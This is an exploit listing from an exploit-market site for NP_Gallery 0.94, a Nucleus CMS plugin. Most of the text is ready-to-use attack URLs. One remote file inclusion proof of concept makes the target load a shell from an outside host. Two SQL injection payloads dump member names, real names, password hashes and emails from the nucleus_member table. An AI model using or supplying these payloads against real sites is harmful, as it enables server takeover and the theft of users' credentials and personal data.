[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Nucleus Plugin Gallery RFI & SQLi Vulnerability

Author
AntiSecurity
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12440
Category
web applications
Date add
29-05-2010
Platform
php
===============================================
Nucleus Plugin Gallery RFI & SQLi Vulnerability
===============================================


=============================================================================================================
 
 
  [o] Nucleus Plugin Gallery RFI & SQLi Vulnerability
  
       Software : NP_Gallery version 0.94
       Download : http://wakka.xiffy.nl/_media/np_gallery_0941.zip?id=gallery&cache=cache
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
=============================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=[evilc0de]
 
       http://localhost/[path]/index.php?action=plugin&name=gallery&type=album&id=[SQLi]
 
       http://localhost/[path]/index.php?action=plugin&name=gallery&type=item&id=[SQLi]
 
 
  [o] PoC
 
       http://localhost/nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://host.com/shell?
 
       http://localhost/index.php?action=plugin&name=gallery&type=album&id=1+and+1=2+union+select+1,group_concat(mname,0x3a,mrealname,0x3a,mpassword,0x3a,memail),3,4,5,6,7,8,9,10+from+nucleus_member--
 
       http://localhost/index.php?action=plugin&name=gallery&type=item&id=1+and+1=2+union+select+1,group_concat(mname,0x3a,mrealname,0x3a,mpassword,0x3a,memail),3,4,5,6,7,8,9,10+from+nucleus_member--
 
 
=============================================================================================================



#  0day.today [2024-12-23]  #